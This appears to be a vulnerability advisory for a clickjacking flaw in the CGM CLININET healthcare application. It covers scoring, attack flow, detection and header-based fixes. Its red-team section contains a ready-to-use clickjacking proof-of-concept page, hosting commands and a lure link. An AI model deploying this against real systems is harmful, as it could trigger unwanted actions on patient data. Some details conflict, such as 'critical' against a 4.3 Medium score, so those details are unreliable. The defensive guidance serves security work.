CVE-2025-58405
Executive Summary
CVE-2025-58405 identifies a critical clickjacking vulnerability in the CGM CLININET application. The application fails to implement any frame-busting protections, such as the X-Frame-Options HTTP header, Content-Security-Policy frame-ancestors directive, or JavaScript-based frame-breaking scripts. This allows an attacker to embed the vulnerable application within a maliciously crafted <iframe> on an attacker-controlled page. By tricking authenticated users into performing unintended actions (e.g., clicking buttons, submitting forms), an attacker can bypass CSRF/XSRF defenses and execute actions on behalf of the victim. The vulnerability is currently unpatched, and no public exploit code is available.

Supply Chain & Package Security
This vulnerability is not related to any open-source package manager (NPM, PyPI, Go, Ruby). It affects a proprietary healthcare application (CGM CLININET). No supply chain attack vector is identified.
CVSS Breakdown & Threat Level
- CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
- Base Score: 4.3 (Medium)
- Attack Vector (AV): Network – The attack is launched over the network.
- Attack Complexity (AC): Low – No special conditions are required.
- Privileges Required (PR): None – The attacker does not need prior authentication.
- User Interaction (UI): Required – The victim must click or interact with the iframe.
- Scope (S): Unchanged – The vulnerable component and the attacker’s page are in different security contexts.
- Confidentiality (C): None – No data is directly disclosed.
- Integrity (I): Low – The attacker can modify data or perform actions on behalf of the user.
- Availability (A): None – No impact on system availability.
Threat Level: Medium. While the CVSS score is moderate, the real-world risk is elevated in healthcare environments where user actions (e.g., viewing patient records, approving prescriptions) can be hijacked. The lack of a patch increases the urgency.
Deep Dive & Mechanics
Clickjacking (UI redressing) exploits the absence of frame-busting controls. The CGM CLININET application does not send the X-Frame-Options header (e.g., DENY or SAMEORIGIN) nor does it include a Content-Security-Policy header with frame-ancestors 'none'. Additionally, no JavaScript frame-breaking code (e.g., if (top != self) { top.location = self.location; }) is present in the application’s pages.
Attack Flow:
- The attacker creates a malicious HTML page that loads the CGM CLININET application inside an
<iframe>. - The attacker uses CSS to make the iframe transparent or to overlay it with deceptive UI elements (e.g., a fake “Click to win a prize” button).
- The victim, authenticated to the CLININET application, visits the attacker’s page.
- The victim clicks on the deceptive overlay, which actually triggers a click on a sensitive button inside the iframe (e.g., “Delete Patient Record” or “Approve Order”).
- The action is executed in the context of the victim’s authenticated session, bypassing CSRF tokens (since the token is automatically submitted with the request).
Why CSRF Bypass Occurs: Clickjacking does not require the attacker to know the CSRF token. The victim’s browser automatically includes the token when submitting the form from within the iframe, as long as the victim is already authenticated. This makes clickjacking a powerful technique to bypass CSRF protections.
Vulnerable vs. Patched Code
Vulnerable Code (Absence of Protections): The application’s HTTP response headers lack frame-busting directives. Example of a vulnerable response:
HTTP/1.1 200 OK
Content-Type: text/html
...
No X-Frame-Options or Content-Security-Policy header is present.
Patched Code (Expected Fix): The application should include one or both of the following headers in all responses:
X-Frame-Options: DENY
Content-Security-Policy: frame-ancestors 'none';
Additionally, JavaScript frame-busting can be added as a defense-in-depth measure:
if (top !== self) {
top.location = self.location;
}
Exploitation & Lab Setup
Red Team (Attack Simulation)
Lab Environment:
- Target: CGM CLININET instance (e.g.,
https://clininetserver.example.com) - Attacker machine: Kali Linux with a simple HTTP server (e.g., Python
http.server) - Victim: Browser with an active authenticated session to the target
Exploitation Steps:
- Create a malicious HTML file (
clickjack.html):
<!DOCTYPE html>
<html>
<head>
<title>Clickjacking PoC</title>
<style>
iframe {
width: 800px;
height: 600px;
position: absolute;
top: -100px;
left: -200px;
opacity: 0.5; /* Make transparent for stealth */
z-index: 2;
}
.deceptive-button {
position: absolute;
top: 200px;
left: 300px;
z-index: 1;
background: red;
color: white;
padding: 20px;
font-size: 24px;
cursor: pointer;
}
</style>
</head>
<body>
<div class="deceptive-button">Click here for a free gift!</div>
<iframe src="https://clininetserver.example.com/sensitive-action" width="800" height="600"></iframe>
</body>
</html>
- Host the file on the attacker’s machine:
python3 -m http.server 8080
- Send the victim the link:
http://attacker-ip:8080/clickjack.html - When the victim clicks the deceptive button, the click is actually registered on the iframe’s target element (e.g., a “Delete” button).
Note: No public exploit code exists for this CVE. The above is a generic clickjacking PoC.
Blue Team (Detection & Defense)
Detection:
- Monitor HTTP response headers for missing
X-Frame-OptionsorContent-Security-Policyframe-ancestors. - Use web application firewalls (WAF) to inject frame-busting headers if the application does not provide them.
- Deploy client-side JavaScript that detects if the page is loaded in an iframe and breaks out.
Defense:
- Immediate: Add
X-Frame-Options: DENYvia reverse proxy (e.g., Nginx, Apache) or WAF. - Long-term: Patch the application to include proper headers.
- User education: Train users to avoid clicking on suspicious links while authenticated to sensitive applications.
Indicators of Compromise (IOCs)
- Network:
- HTTP responses from the CGM CLININET application missing
X-Frame-OptionsandContent-Security-Policyheaders. - Referer header pointing to an attacker-controlled domain when a sensitive action is performed.
- HTTP responses from the CGM CLININET application missing
- Host:
- Browser console logs showing
Refused to display 'https://clininetserver.example.com' in a frame because it set 'X-Frame-Options' to 'DENY'.(if a fix is applied).
- Browser console logs showing
- Logs:
- Web server logs showing requests with
Refererheader from an unexpected domain. - Application logs showing actions performed without a valid CSRF token (if CSRF is also bypassed).
- Web server logs showing requests with

Remediation & Mitigation
Immediate Actions:
- Add HTTP Headers via Reverse Proxy: If the application cannot be patched immediately, configure the web server or reverse proxy (e.g., Nginx, Apache, HAProxy) to inject the following headers:
X-Frame-Options: DENYContent-Security-Policy: frame-ancestors 'none';
- Deploy WAF Rules: Use a Web Application Firewall to block requests that attempt to embed the application in iframes from external origins.
- Monitor for Clickjacking Attempts: Enable logging of
Refererheaders and alert on unexpected referrers.
Long-Term Fix:
- The vendor (CGM) must update the CLININET application to include frame-busting headers in all responses. Until a patch is released, the above mitigations are critical.
User Awareness:
- Advise users to log out of the CLININET application when not in use.
- Encourage the use of browser extensions that block clickjacking (e.g., NoScript, uBlock Origin).
